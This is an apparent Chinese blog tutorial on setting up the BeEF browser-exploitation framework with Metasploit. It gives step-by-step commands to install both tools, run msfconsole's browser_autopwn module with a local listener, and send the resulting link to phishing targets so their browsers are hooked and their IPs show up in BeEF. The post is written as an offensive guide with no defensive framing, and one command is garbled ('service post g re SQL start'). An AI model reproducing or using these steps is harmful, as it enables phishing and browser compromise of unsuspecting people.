beef-xss社会工程学攻击

首先安装beef-xss我用的是linxu系统

apt-get install beef-xss

选择y

开启msfconsole,如果显示是这样48571a197ed64fc3a2681f4f9969d039.jpg

 说明没有安装msfconsole

apt-get install metasploit-framework

输入y,等待更新

service post g re SQL start开始数据库(运行成功并没有显示)

msfdb init开启初始化

msfconsole(成功的话会有加载项,只需等待运行框变为msf6即可)

9e9bb06711c148c08b2ba4730c674aa0.jpg

 

输入search browser_autopwn

use0

options

设置端口set lhost 192.168.100.4(我自己的)你的可以通过打开一个新终端输入ip addres来查看(192开头)

set srvhost 192.168.100.4

exploit运行

cd88537587b9412aa5f4652af810a75a.jpg

 这个含有192的网址就是攻击网址,发给钓鱼的人

然后新端口输入beef-xss

设置密码后回车进入网页

也就是beef的操作网页

如果钓鱼成功,那么在线那栏就会显示被钓的IP

明天更新beef-xss的具体使用方法

点个赞再走吧

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值